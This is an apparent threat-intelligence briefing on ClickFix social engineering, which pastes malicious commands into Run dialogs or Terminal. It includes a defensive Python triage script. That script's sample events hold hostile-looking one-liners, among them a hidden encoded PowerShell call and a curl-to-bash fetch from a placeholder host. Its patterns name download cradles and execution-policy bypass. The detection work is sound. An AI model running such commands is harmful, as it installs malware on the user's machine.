
ClickFix social engineering technique surges as primary malware delivery method

Incident (open): Jun 30, 2026 to Jul 1, 2026
ClickFix social engineering surges as top malware delivery method

ClickFix social engineering has surged to become the dominant technique for malware delivery, according to analysis from ReliaQuest that shows the method accounted for nearly twenty‑eight percent of defence‑evasion activity in a recent three‑month window. The tactic tricks users into pasting malicious commands into trusted system dialogs on both Windows and macOS, effectively bypassing many conventional security controls. Its rise marks a shift from earlier reliance on exploit kits to pure social engineering chains.

The core of a ClickFix attack is a fabricated error message or a fake CAPTCHA page hosted on a compromised website, which prompts the victim to copy a PowerShell or Terminal command and paste it into a trusted execution prompt such as the Windows Run dialog or macOS Terminal. Variants labelled CrashFix have been observed that mimic system crash reports to heighten the sense of urgency. Once the command runs, downloaders like Deepload or information‑stealers such as Atomic Stealer are deployed without triggering typical antivirus alerts, because the user, not an exploit, launched the interpreter.

Researchers noted that the payloads observed in these campaigns include credential harvesters, cryptocurrency miners and remote access tools, all designed to establish persistence while remaining low‑profile. The technique has evolved from being primarily distributed via malicious web pages to also appearing in phishing emails that contain links to the deceptive pages. No specific CVEs have been associated with ClickFix, underscoring its reliance on human error rather than software vulnerabilities.

Activity linked to ClickFix was first detected on 30 June 2026 and continued through 1 July 2026, with no single threat actor publicly attributed to the wave. The method’s adaptability has allowed it to bypass sandboxing and URL filtering by leveraging legitimate‑looking prompts that users expect to see during routine tasks. Security teams warn that the trend reflects a broader move toward abuse of trusted interfaces as a primary infection vector.

Defenders should begin by reviewing endpoint logs for unusual command‑line executions, especially script interpreters spawned directly by user‑facing processes such as explorer.exe or loginwindow.app rather than by the usual administrative tooling. Restricting the ability to paste clipboard contents into run dialogs through group policy or mobile device management configurations can reduce the success rate of these attacks. Application control policies that whitelist only approved scripting engines also help block unexpected PowerShell or bash invocations.
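As an added illustration of the log review recommended above (example code, not from the ReliaQuest analysis or this briefing), the following Python scores constructed process‑creation events for the ClickFix pattern: a shell or script host spawned directly by a user‑facing parent with a command line that carries the usual hallmarks of a pasted one‑liner. The event field names, the sample commands and the `example.invalid` host are assumptions.

```python
from __future__ import annotations
import re
from pathlib import PureWindowsPath, PurePosixPath

# Constructed sample events; field names are an assumption loosely modelled on
# Sysmon/EDR process-creation logs, not records from any real host.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -w hidden -nop -ep bypass -enc QUFBQQ=="},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe"},
    {"ParentImage": r"C:\Program Files\VSCode\Code.exe",          # benign dev tooling
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -File build.ps1"},
    {"ParentImage": "/System/Library/CoreServices/loginwindow.app/Contents/MacOS/loginwindow",
     "Image": "/bin/bash",
     "CommandLine": 'bash -c "curl -fsSL http://example.invalid/fix.sh | bash"'},
]

USER_FACING_PARENTS = {"explorer.exe", "loginwindow", "finder"}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "bash", "sh", "zsh", "osascript"}

# Well-known hallmarks of pasted one-liners: (label, compiled pattern).
INDICATORS = [
    ("encoded-command", re.compile(r"(?i)(?:^|\s)-e(?:nc|ncodedcommand|c)?(?:\s|$)")),
    ("hidden-window", re.compile(r"(?i)-w(?:indowstyle)?\s+hidden")),
    ("policy-bypass", re.compile(r"(?i)-(?:ep|executionpolicy)\s+bypass")),
    ("download-cradle", re.compile(r"(?i)invoke-webrequest|downloadstring|\biwr\b|\bcurl\b.*\|\s*(?:ba|z)?sh\b")),
    ("invoke-expression", re.compile(r"(?i)\biex\b|invoke-expression")),
]

def basename(path: str) -> str:
    """Executable name in lower case, for Windows or POSIX path styles."""
    name = PureWindowsPath(path).name if "\\" in path else PurePosixPath(path).name
    return name.lower()

def score_event(event: dict) -> tuple[int, list[str]]:
    """Score one event; each matched reason adds one point. Non-interpreters score 0."""
    reasons: list[str] = []
    parent, child = basename(event["ParentImage"]), basename(event["Image"])
    if child not in INTERPRETERS:
        return 0, reasons
    if parent in USER_FACING_PARENTS:
        reasons.append(f"interpreter spawned by user-facing parent {parent}")
    reasons.extend(label for label, rx in INDICATORS if rx.search(event["CommandLine"]))
    return len(reasons), reasons

def triage(events: list[dict], threshold: int = 2) -> list[dict]:
    """Return events at or above the threshold, annotated with score and reasons."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append({**ev, "score": score, "reasons": reasons})
    return hits
```

Tune the threshold to your environment: a parent match alone scores 1, so a single indicator must also be present before an event is surfaced, which keeps ordinary interactive shells out of the queue.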

Organisations are advised to refresh security awareness programmes, emphasising that legitimate system alerts will never ask users to execute arbitrary commands. Conducting regular phishing simulations that incorporate ClickFix‑style lures can improve user vigilance. Finally, ensuring that anti‑malware solutions are configured to detect known indicators such as the Deepload and Atomic Stealer signatures, while maintaining up‑to‑date threat intelligence feeds, will aid in early detection and containment.

Intelligence briefing updated Jul 1, 2026

Root source: reliaquest.com